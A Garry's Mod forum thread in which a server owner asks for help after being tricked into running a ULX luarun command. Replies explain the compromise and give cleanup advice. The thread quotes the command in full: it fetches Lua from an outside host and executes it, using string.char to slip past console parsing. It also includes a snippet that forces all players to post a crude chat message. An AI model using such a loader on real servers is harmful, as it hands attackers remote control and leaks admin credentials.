• Garrys Mod Luarun Grabbed rcon password
    13 replies, posted
Player X joined the server crashed then came back and told me to do "ulx luarun http.Fetch ( [[http]]..string.char ( 58 ) ..[[/]]..[[/squish.space/m/ll.lua]], function ( ret ) RunString ( ret ) end ) " nothing happened at first then i looked in console and saw that console was giving the player money.. the luarun grabbed rcon password..... Please help [highlight](User was banned for this post ("Wrong Section - use the DEVELOPER DISCUSSION for this" - Kiwi))[/highlight]
Okay so first off, do not ever run random stuff in the console that someone gives you. This is like letting a stranger into your house, seriously. Change your RCON password, now. This player has full control over your server with it.
[QUOTE=SirSavary;52459420]Okay so first off, do not ever run random stuff in the console that someone gives you. This is like letting a stranger into your house, seriously. Change your RCON password, now. This player has full control over your server with it.[/QUOTE] Yes i have learned that we changed everything.. How did this player do this what does that line of code do
The code is deleted off of the site now, but the domain links back to this guy: [url]https://steamcommunity.com/id/KieransThicc/[/url]
[QUOTE=Young-Bagel;52459441]Yes i have learned that we changed everything.. How did this player do this what does that line of code do[/QUOTE] The little piece of code he had you put in the console downloaded (and executed) a much larger piece of code. He's deleted it now so we can't see what it did but it likely gave him admin access and sent your RCON password back to him.
Here's the code for anyone interested, dumped it earlier: [url]https://pastebin.com/VFty7Qj2[/url]
Change your rcon password again after checking everything else out. If you're running a gamemode with exploitable deserialization, clear your data folder. Check ULX or whatever admin mod you use for foreign users and groups. You should probably just nuke the data folder anyways, to be honest. User who trolled you is just a script kiddie, nothing to worry about there. Check the website for proof - generic cookie cutter '''hacker''' website, anti inspect scripts, nothing special.
[lua][[http]]..string.char ( 58 ) ..[[/]]..[[/squish.space/m/ll.lua]][/lua] What's the point of this seriously This is the worst "obfuscation" ever
[QUOTE=Luni;52459788][lua][[http]]..string.char ( 58 ) ..[[/]]..[[/squish.space/m/ll.lua]][/lua] What's the point of this seriously This is the worst "obfuscation" ever[/QUOTE] Source splits a command on ':' character. It's still a dumb way to get around using quotes, though.
[QUOTE=EdwardRich;52459794]Source splits a command on ':' character. It's still a dumb way to get around using quotes, though.[/QUOTE] I'm just imagining him imagining he's really clever for figuring out string.char() lol And what's with Gmod script kiddies and thinking they're hot shit for being able to drop some tables? [lua]for k,v in pairs(player.GetAll()) do v:ConCommand("say /a I have been raped by Frost le almighty.") end[/lua]
Rofl I made this in 10 mins for some kid who paid me like 30usd for it so no complaints on my behalf xD
[QUOTE=squishjen;52460664]Rofl I made this in 10 mins for some kid who paid me like 30usd for it so no complaints on my behalf xD[/QUOTE] ekcs deeeee ela mayo
[QUOTE=Luni;52459788][lua][[http]]..string.char ( 58 ) ..[[/]]..[[/squish.space/m/ll.lua]][/lua] What's the point of this seriously This is the worst "obfuscation" ever[/QUOTE] This is not [QUOTE=Luni;52459788]"obfuscation"[/QUOTE] This was so it could be used in ULX luarun without the to slashes causing any problems.
Sorry, you need to Log In to post a reply to this thread.